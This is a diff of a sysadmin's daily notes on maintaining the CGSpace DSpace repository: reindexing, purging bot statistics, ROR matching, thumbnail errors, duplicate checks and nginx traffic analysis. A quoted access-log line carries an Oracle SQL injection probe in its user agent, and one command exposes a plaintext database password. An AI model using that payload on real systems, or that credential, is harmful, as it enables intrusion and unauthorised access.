                                                                                                                                                                                                                                                                                                                                                                                                    -real    275m15.777s
                                                                                                                                                                                                                                                                                                                                                                                                    -user    182m52.171s
                                                                                                                                                                                                                                                                                                                                                                                                    -sys     2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      +real    275m15.777s
                                                                                                                                                                                                                                                                                                                                                                                                      +user    182m52.171s
                                                                                                                                                                                                                                                                                                                                                                                                      +sys     2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      • I got a request to confirm validation of CGSpace on openarchives.org, with the requestor’s IP being 128.84.116.66
                                                                                                                                                                                                                                                                                                                                                                                                        • That is at Cornell… hmmmm who could that be?!
@@ -192,8 +192,8 @@ sys 2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] "GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1" 200 1157807 "https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf" "Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917"
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        • 3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
                                                                                                                                                                                                                                                                                                                                                                                                          • The user agent is sometimes a normal user one, and sometimes Apache-HttpClient/4.3.4 (java 1.5)
@@ -202,27 +202,27 @@ sys 2m51.573s
                                                                                                                                                                                                                                                                                                                                                                                                          • 217.182.21.193 made 2,400 requests and is on OVH
                                                                                                                                                                                                                                                                                                                                                                                                          • I purged these hits
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 26817 hits from 64.39.98.40 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 9446 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 6490 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -Purging 11949 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          -Total number of bot hits purged: 54702
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 26817 hits from 64.39.98.40 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 9446 hits from 45.134.26.171 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 6490 hits from 3.225.28.105 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +Purging 11949 hits from 217.182.21.193 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            +Total number of bot hits purged: 54702
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            • Export donors and affiliations from CGSpace database:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                            -COPY 1036
                                                                                                                                                                                                                                                                                                                                                                                                            -localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                            -COPY 7901
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              +COPY 1036
                                                                                                                                                                                                                                                                                                                                                                                                              +localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              +COPY 7901
                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                              • Then check matches against the latest ROR dump:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              $ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                $ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed '1d' > /tmp/2022-02-02-donors.txt
                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                • I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)
                                                                                                                                                                                                                                                                                                                                                                                                                • I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)
                                                                                                                                                                                                                                                                                                                                                                                                                • Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test
@@ -245,37 +245,37 @@ $ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json
                                                                                                                                                                                                                                                                                                                                                                                                                • I synchronized DSpace Test with a fresh snapshot of CGSpace
• I noticed that thumbnails were missing for a number of items submitted to CGSpace in the last week, so I ran the dspace filter-media script manually, and it eventually crashed:
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
                                                                                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                                                                                -SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                -Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
                                                                                                                                                                                                                                                                                                                                                                                                                -SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                -File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                -Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                -java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media
                                                                                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                                                                                  +SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.txt' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                  +Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
                                                                                                                                                                                                                                                                                                                                                                                                                  +SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because 'ilri_establishiment.pdf.jpg' already exists
                                                                                                                                                                                                                                                                                                                                                                                                                  +File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  +Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                  +java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.FormattedDiskPage.<init>(FormattedDiskPage.java:66)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.CHPFormattedDiskPage.<init>(CHPFormattedDiskPage.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.model.CHPBinTable.<init>(CHPBinTable.java:70)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  • I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
                                                                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                                                                  2022-02-04

                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media.log
                                                                                                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                                                                                                  2022-02-04

                                                                                                                                                                                                                                                                                                                                                                                                                  • I found a thread on the dspace-tech mailing list about the media-filter crash above
                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -284,14 +284,14 @@ java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([B
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
                                                                                                                                                                                                                                                                                                                                                                                                                  -The following MediaFilters are enabled: 
                                                                                                                                                                                                                                                                                                                                                                                                                  -Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                  -org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                  -File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                  -FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -i 10568/67391 -p "Word Text Extractor" -v
                                                                                                                                                                                                                                                                                                                                                                                                                    +The following MediaFilters are enabled: 
                                                                                                                                                                                                                                                                                                                                                                                                                    +Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                    +org.dspace.app.mediafilter.PoiWordFilter
                                                                                                                                                                                                                                                                                                                                                                                                                    +File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    +FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created 'Agreement_on_the_Estab_of_ILRI.doc.txt'
                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                    • Meeting with the repositories working group to discuss issues moving forward in the One CGIAR

                                                                                                                                                                                                                                                                                                                                                                                                                    2022-02-07

                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -302,20 +302,20 @@ File: Agreement_on_the_Estab_of_ILRI.doc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                or(
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('1')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('4')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('5')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('6')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('8')),
                                                                                                                                                                                                                                                                                                                                                                                                                -...
-isNotNull(value.match('178')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('186')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('188')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('189')),
                                                                                                                                                                                                                                                                                                                                                                                                                -isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  or(
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('1')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('4')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('5')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('6')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('8')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +...
+isNotNull(value.match('178')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('186')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('188')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('189')),
                                                                                                                                                                                                                                                                                                                                                                                                                  +isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                  • Then I flagged all of these (seventy-five items)…
• I decided to flag the deletes instead of starring the keeps because there are some items in the original file that were not marked as duplicates, so we have to keep those too
                                                                                                                                                                                                                                                                                                                                                                                                                    • @@ -323,19 +323,19 @@ isNotNull(value.match('197'))
                                                                                                                                                                                                                                                                                                                                                                                                                    • I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/tac.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-02-07-tac-batch2-201-400.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv > /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv > /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      • Then I sent this second batch of items to Gaia to look at
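The `csvjoin -c id` step above is an inner join of two CSVs on their shared `id` column. A minimal Python sketch of that join using only the standard library follows. The function name `join_on_id` and the sample rows are hypothetical, and unlike csvkit this sketch overwrites any non-key columns that share a name rather than renaming them.

```python
import csv
import io


def join_on_id(left_rows, right_rows, key="id"):
    """Inner-join two lists of dict rows on `key` (roughly `csvjoin -c id`)."""
    # Index the right-hand rows by key so each left row is matched in O(1).
    right_by_key = {}
    for row in right_rows:
        right_by_key.setdefault(row[key], []).append(row)

    joined = []
    for row in left_rows:
        # Rows without a partner on the right are dropped (inner join).
        for match in right_by_key.get(row[key], []):
            merged = dict(row)
            merged.update({k: v for k, v in match.items() if k != key})
            joined.append(merged)
    return joined


def read_csv_text(text):
    """Parse CSV text into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(text)))


if __name__ == "__main__":
    # Hypothetical stand-ins for the duplicates report and the filenames CSV.
    duplicates = read_csv_text("id,dc.title\n201,First title\n202,Second title\n")
    filenames = read_csv_text("id,filename\n201,first.pdf\n202,second.pdf\n")
    for row in join_on_id(duplicates, filenames):
        print(row)
```

For real files, `csv.DictReader(open(path, newline=""))` would replace the in-memory text used here.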

                                                                                                                                                                                                                                                                                                                                                                                                                      2022-02-08

                                                                                                                                                                                                                                                                                                                                                                                                                      • Create a SAF archive for the first 200 items (IDs 1 to 200) that were not flagged as duplicates and upload them to a new collection on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                      $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-08-tac-batch1-1to200.map
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        • Fix some occurrences of “Hammond, Jim” to be “Hammond, James” on CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                                        • Start a full index on AReS
                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -355,12 +355,12 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                        • I extract the logs from nginx for yesterday so I can analyze the traffic:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
                                                                                                                                                                                                                                                                                                                                                                                                                        -# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
                                                                                                                                                                                                                                                                                                                                                                                                                        -# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        -# wc -l /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        -11636 /tmp/feb9-ips.tx
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-access.log
                                                                                                                                                                                                                                                                                                                                                                                                                          +# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep '09/Feb/2022' > /tmp/feb9-rest.log
                                                                                                                                                                                                                                                                                                                                                                                                                          +# awk '{print $1}' /tmp/feb9-* | less | sort -u > /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                          +# wc -l /tmp/feb9-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                          +11636 /tmp/feb9-ips.tx
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          • I started resolving them with my resolve-addresses-geoip2.py script
                                                                                                                                                                                                                                                                                                                                                                                                                          • In the mean time I am looking at the requests and I see a new user agent: 1science Resolver 1.0.0
                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -374,52 +374,52 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n 20
                                                                                                                                                                                                                                                                                                                                                                                                                            -     79 24940
                                                                                                                                                                                                                                                                                                                                                                                                                            -     89 36908
                                                                                                                                                                                                                                                                                                                                                                                                                            -    100 9299
                                                                                                                                                                                                                                                                                                                                                                                                                            -    107 2635
                                                                                                                                                                                                                                                                                                                                                                                                                            -    110 44546
                                                                                                                                                                                                                                                                                                                                                                                                                            -    111 16509
                                                                                                                                                                                                                                                                                                                                                                                                                            -    118 7552
                                                                                                                                                                                                                                                                                                                                                                                                                            -    120 4837
                                                                                                                                                                                                                                                                                                                                                                                                                            -    123 50245
                                                                                                                                                                                                                                                                                                                                                                                                                            -    123 55836
                                                                                                                                                                                                                                                                                                                                                                                                                            -    147 45899
                                                                                                                                                                                                                                                                                                                                                                                                                            -    173 33771
